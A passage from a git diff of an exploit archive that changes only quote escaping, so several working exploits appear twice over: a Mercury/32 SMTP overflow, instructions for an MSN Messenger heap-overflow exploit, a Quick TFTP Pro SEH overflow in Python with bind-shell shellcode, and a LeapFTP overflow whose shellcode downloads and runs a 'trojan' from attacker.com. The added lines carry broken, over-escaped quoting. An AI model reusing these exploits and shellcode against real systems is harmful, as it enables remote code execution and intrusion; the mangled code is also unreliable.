+	printf(\"[+] Reply: %s\\n\",bufmax);	
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf("[+] Reply: %s\n",bufmax);
+	printf(\"[+] Reply: %s\\n\",bufmax);
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf("[+] Reply: %s\n",bufmax);
+	printf(\"[+] Reply: %s\\n\",bufmax);
 
 	// ALL is OKE	
-	printf("[+] Sending payload...\n");
+	printf(\"[+] Sending payload...\\n\");
 	memset(sendbuf, 0, sizeof(sendbuf));
 	base64_encode(buf, len, sendbuf);
-	sendbuf[strlen(sendbuf)]= '\r';
-	sendbuf[strlen(sendbuf)]= '\n';
+	sendbuf[strlen(sendbuf)]= \'\\r\';
+	sendbuf[strlen(sendbuf)]= \'\\n\';
 	send(s, sendbuf, (int)strlen(sendbuf), 0);
 	
 	closesocket(s);
@@ -470,12 +470,12 @@ int getopt(int argc, char *argv[], char *optstring)
 
 	optarg = NULL;
 
-	if (next == NULL || *next == '\0')
+	if (next == NULL || *next == \'\\0\')
 	{
 		if (optind == 0)
 			optind++;
 
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		if (optind >= argc || argv[optind][0] != \'-\' || argv[optind][1] == \'\\0\')
 		{
 			optarg = NULL;
 			if (optind < argc)
@@ -483,7 +483,7 @@ int getopt(int argc, char *argv[], char *optstring)
 			return EOF;
 		}
 
-		if (strcmp(argv[optind], "--") == 0)
+		if (strcmp(argv[optind], \"--\") == 0)
 		{
 			optind++;
 			optarg = NULL;
@@ -500,13 +500,13 @@ int getopt(int argc, char *argv[], char *optstring)
 	char c = *next++;
 	char *cp = strchr(optstring, c);
 
-	if (cp == NULL || c == ':')
-		return '?';
+	if (cp == NULL || c == \':\')
+		return \'?\';
 
 	cp++;
-	if (*cp == ':')
+	if (*cp == \':\')
 	{
-		if (*next != '\0')
+		if (*next != \'\\0\')
 		{
 			optarg = next;
 			next = NULL;
@@ -518,7 +518,7 @@ int getopt(int argc, char *argv[], char *optstring)
 		}
 		else
 		{
-			return '?';
+			return \'?\';
 		}
 	}
 
@@ -532,56 +532,56 @@ int getopt(int argc, char *argv[], char *optstring)
 
 void usage(char * s)
 {	
-	printf("\n");
-	printf("    Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\n\n", s);	
-	printf("    Arguments:\n");
-	printf("     -p <port>      Port of the Mercury SMTP (default: 25)\n");
-	printf("     -h <host>      Hostname of the server\n");
-	printf("     -s <shellcode> Payload to use (default: 1)\n");
-	printf("     -t <target>    Target to attack (default: 1)\n");
+	printf(\"\\n\");
+	printf(\"    Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\\n\\n\", s);	
+	printf(\"    Arguments:\\n\");
+	printf(\"     -p <port>      Port of the Mercury SMTP (default: 25)\\n\");
+	printf(\"     -h <host>      Hostname of the server\\n\");
+	printf(\"     -s <shellcode> Payload to use (default: 1)\\n\");
+	printf(\"     -t <target>    Target to attack (default: 1)\\n\");
 	
-	printf("\n");
-	printf("    Shellcodes:\n");
+	printf(\"\\n\");
+	printf(\"    Shellcodes:\\n\");
 	for(int i=0; shellcodes[i].name!=0;i++)
 	{
-		printf("      %d. %s\n",i+1,shellcodes[i].name);				
+		printf(\"      %d. %s\\n\",i+1,shellcodes[i].name);				
 	}	
-	printf("\n");
-	printf("    Targets:\n");
+	printf(\"\\n\");
+	printf(\"    Targets:\\n\");
 	for(int j=0; targets[j].t!=0;j++)
 	{
-		printf("      %d. %s\n",j+1,targets[j].t);
+		printf(\"      %d. %s\\n\",j+1,targets[j].t);
 	}		
-	printf("\n");
+	printf(\"\\n\");
 	end_logo();	
 }
 
 void logo()
 {
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit        # \n");
-	printf(" #  Tested  : Mercury/32 SMTP v3.32, v4.01a, v4.51                     # \n");
-	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
-	printf(" #  Research: eliteb0y                                                 # \n");
-	printf(" #  Version : 1.0                                                      # \n");
-	printf(" #  System  : Windows ALL                                              # \n");
-	printf(" #  Date    : 26.08.2007                                               # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
+	printf(\"\\n\\n\");
+	printf(\" ####################################################################### \\n\");	
+	printf(\" #     ____                 __  _                  ______  __    _____ #\\n\");
+	printf(\" #    / __ \\\\________  _____/ /_(_)_________       / __/\\\\ \\\\/ /   / _  / #\\n\");
+	printf(\" #   / / / / ___/ _ \\\\/ __ / __/ / ___/ __ / ___  / /    \\\\  /   / // /  #\\n\");
+	printf(\" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\\\  / ___/   #\\n\");
+	printf(\" # /_____/_/  \\\\___/ \\\\_,_/\\\\__/_/\\\\___/\\\\__,_/     /_/     /_/\\\\_\\\\/_/       #\\n\");
+	printf(\" #                                 crew                                #\\n\");
+	printf(\" ####################################################################### \\n\");	
+	printf(\" #  Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit        # \\n\");
+	printf(\" #  Tested  : Mercury/32 SMTP v3.32, v4.01a, v4.51                     # \\n\");
+	printf(\" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \\n\");
+	printf(\" #  Research: eliteb0y                                                 # \\n\");
+	printf(\" #  Version : 1.0                                                      # \\n\");
+	printf(\" #  System  : Windows ALL                                              # \\n\");
+	printf(\" #  Date    : 26.08.2007                                               # \\n\");
+	printf(\" # ------------------------------------------------------------------- # \\n\");
 }
 
 void end_logo()
 {
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
+	printf(\" # ------------------------------------------------------------------- # \\n\");
+	printf(\" #                    Dreatica-FXP crew [Heretic2]                     # \\n\");	
+	printf(\" ####################################################################### \\n\\n\");
 }
 
 // milw0rm.com [2007-08-26]
diff --git a/platforms/windows/remote/4334.txt b/platforms/windows/remote/4334.txt
index acb3b0ec3..27c0bc036 100755
--- a/platforms/windows/remote/4334.txt
+++ b/platforms/windows/remote/4334.txt
@@ -3,9 +3,9 @@ MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit
 thanks ole andre again, His ospy is perfect.
 
 1.compile the dll.
-2.inject the dll to msn messenger 7.0.777.0 's process.
-3. choose "send my webcam" to a contact id who is online using 7.x (8.0?).
-4.when the otherside accept the invatation , the otherside's msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll's sourcecode. 
+2.inject the dll to msn messenger 7.0.777.0 \\\'s process.
+3. choose \\\"send my webcam\\\" to a contact id who is online using 7.x (8.0?).
+4.when the otherside accept the invatation , the otherside\\\'s msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll\\\'s sourcecode. 
 
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4334.rar (08292007-exp_msn.rar)
 
diff --git a/platforms/windows/remote/4715.txt b/platforms/windows/remote/4715.txt
index c3cde7af5..dbfef7a8f 100755
--- a/platforms/windows/remote/4715.txt
+++ b/platforms/windows/remote/4715.txt
@@ -65,7 +65,7 @@ configuration of the server.
 C] path disclosure
 ------------------
 
-The full path of the webserver is visible when using the "?&browse="
+The full path of the webserver is visible when using the \"?&browse=\"
 parameter on an unexistent folder, useful in conjunction with bug B.
 
 
diff --git a/platforms/windows/remote/5315.py b/platforms/windows/remote/5315.py
index 4ee021e46..d6ef08e10 100755
--- a/platforms/windows/remote/5315.py
+++ b/platforms/windows/remote/5315.py
@@ -15,58 +15,58 @@
 # Microsoft Windows XP [Version 5.1.2600]
 # (C) Copyright 1985-2001 Microsoft Corp.
 #
-# C:\Documents and Settings\Administrator>
+# C:\\Documents and Settings\\Administrator>
 ##########################################################
 import socket
 import sys
 
-print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
-print "[*] http://www.offensive-security.com"
+print \"[*] Quick TFTP Pro 2.1 SEH Overflow (0day)\"
+print \"[*] http://www.offensive-security.com\"
 
-host = '172.16.167.134'
+host = \'172.16.167.134\'
 port = 69
 
 try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 except:
-   print "socket() failed"
+   print \"socket() failed\"
    sys.exit(1)
 
-filename = "pwnd"
+filename = \"pwnd\"
 
 # windows/shell_bind_tcp - 317 bytes
 # http://www.metasploit.com
 # EXITFUNC=thread, LPORT=4444
 
-shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
-"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
-"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
-"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
-"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
-"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
-"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
-"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
-"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
-"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
-"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
-"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
-"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
-"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
-"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
-"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
-"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
-"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
-"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
-"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
-"\xff\xd0")
+shell=(\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\"
+\"\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\"
+\"\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\"
+\"\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\"
+\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\"
+\"\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"
+\"\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\"
+\"\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\"
+\"\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\"
+\"\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\"
+\"\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66\"
+\"\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51\"
+\"\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0\"
+\"\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93\"
+\"\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\"
+\"\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
+\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\"
+\"\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\"
+\"\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\"
+\"\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\"
+\"\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6\"
+\"\\xff\\xd0\")
 
-mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
+mode = \"A\"*1019+\"\\xeb\\x08\\x90\\x90\"+\"\\x58\\x14\\xd3\\x74\"+\"\\x90\"*16+shell
 
-muha = "\x00\x02" + filename+ "\0" + mode + "\0" 
+muha = \"\\x00\\x02\" + filename+ \"\\0\" + mode + \"\\0\" 
 
-print "[*] Sending evil packet, ph33r"
+print \"[*] Sending evil packet, ph33r\"
 s.sendto(muha, (host, port))
-print "[*] Check port 4444 for bindshell"
+print \"[*] Check port 4444 for bindshell\"
 
 # milw0rm.com [2008-03-26]
diff --git a/platforms/windows/remote/54.c b/platforms/windows/remote/54.c
index 98ecc952a..8a0454d9c 100755
--- a/platforms/windows/remote/54.c
+++ b/platforms/windows/remote/54.c
@@ -1,7 +1,7 @@
 /*
 ,----------------------------------------------------
 ;     LeapFTP remote buffer overflow exploit     
-;              by drG4njubas \\ DWC Group
+;              by drG4njubas \\\\ DWC Group
 `----------------------------------------------------
 ,----------------------------------------------------
 ;This exploit works against LeapFTP 2.7.3.600
@@ -9,7 +9,7 @@
 ;Technical details: When LeapFTP requests IP 
 ;and port by using PASV command if pasv mode 
 ;is enabled, it causes the buffer overflow on
-;the stack area if server's reply for this 
+;the stack area if server\'s reply for this 
 ;PASV request has a long IP address: 
 ;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
 ;And this buffer overflow can overwrite a 
@@ -19,7 +19,7 @@
 ;reply contains 0x29 and 0x2E bytes, an 
 ;exception occurs before Structured Exception
 ;Handler is overvritten and program continues
-;it's normal work. Thanks a lot to RaiSe for 
+;it\'s normal work. Thanks a lot to RaiSe for 
 ;his wonderful shellcode.
 `----------------------------------------------------
 */
@@ -29,109 +29,109 @@
 
 void main(int argc, char *argv[]){
 
-printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
-printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
-printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
-printf("; www.dwcgr0up.net ;\n");
-printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");
+printf(\",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\n\");
+printf(\";LeapFTP 2.7.3.600 remote buffer overflow exploit;\\n\");
+printf(\"; Coded by drG4njubas \\\\\\\\ DWC Security Group ;\\n\");
+printf(\"; www.dwcgr0up.net ;\\n\");
+printf(\"\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\\n\");
 
 if(argc < 3){
-printf("USAGE : dwclft273.exe <port> <trojan url>\n");
-printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
+printf(\"USAGE : dwclft273.exe <port> <trojan url>\\n\");
+printf(\"EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\\n\");
 return;
 }
 
 char exploit[] =
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
-"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
-"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
-"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
-"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
-"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
-"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
-"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
-"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
-"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
-"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
-"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
-"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
-"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
-"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
-"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
-"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
-"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
-"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
-"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
-"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
-"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
-"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
-"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
-"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
-"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
-"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
-"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
-"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
-"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
-"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
-"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
-"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
-"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
-"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
-"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
-"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
-"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
-"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
-"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
-"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
-"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
-"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
-"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
-"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
-"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
-"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
-"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
-"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
-"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
-"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
-"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
-"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
-"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
-"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
-"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
-"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
-"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
-"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
-"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
-"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
-"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
-"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
-"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
-"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
-"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
-"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
-"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
-"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
-"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
-"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
